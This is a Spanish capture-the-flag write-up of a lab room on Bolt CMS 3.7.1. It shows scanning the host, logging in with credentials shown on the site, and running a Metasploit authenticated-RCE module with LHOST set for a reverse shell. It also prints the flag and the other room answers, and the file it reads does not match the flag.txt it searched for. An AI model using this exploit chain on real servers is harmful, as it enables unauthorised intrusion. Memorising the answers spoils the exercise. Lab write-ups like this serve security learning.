Esta habitación está diseñada para familiarizarnos con el CMS Bolt, y cómo puede explotarse mediante la Ejecución Remota de Código (RCE) Autenticado, es decir que precisamos credenciales de acceso para estar dentro del sistema.

Lo que vamos a hacer es enumerar la máquina y encontrar la bandera.

Comenzamos con un escaneo con Rustscan mientras echamos inspeccionamos visualmente la máquina.

rustscan -a IP_Objetivo -- -A

Abiertos los puertos 22 (ssh), 80 (http Apache) y 8000 (http no reconocido exactamente).

En el puerto 80 tenemos la página por defecto de Apache para Ubuntu y en el puerto 8000 está Bolt.

¿En qué puerto corre el CMS?

8000

¿Qué nombre de usuario podemos encontrar en el CMS? (Lo pone en la página principal, junto con la contraseña)

bolt

¿Y cuál es la contraseña?

boltadmin123

¿Qué versión del CMS está instalada en el servidor? No es tan obvio. He buscado la página para identificarse, que es /bolt/login y he puesto las credenciales. En la zona de administración lo dice.

Bolt 3.7.1

Hay un exploit para una versión previa que permite RCE autenticado. Encuéntralo en Exploit-DB, ¿Cuál es el ID?

48296

Metasploit añadió recientemente un módulo para esta vulnerabilidad. ¿Cuál es la ruta completa?

Ejecutamos:

sudo msfconsole
search bolt # y ahí aparece

exploit/unix/webapp/bolt_authenticated_rce

Configura el LHOST, LPORT, RHOST, USERNAME, PASSWORD antes de correr el exploit

search bolt # Buscamos para que nos dé opciones, nos da 2, la que queremos tiene el número 1, así que
use 1
show options
set LHOST IP_Ataque
set RHOST IP_Objetivo
set USERNAME bolt
set PASSWORD boltadmin123 # LPORT está en 4444, lo dejo así
run # En unos instantes obtenemos consola

Buscamos la bandera flag.txt dentro de la máquina.

find / -type f -iname "flag.txt" 2>/dev/null # Buscamos en la máquina
cat /home/user.txt # Leemos en la ubicación que ha encontrado

THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Y ya está, una habitación muy básica con el clásico proceso de escaneo > enumeración > búsqueda de vulnerabilidad > explotación con Metasploit.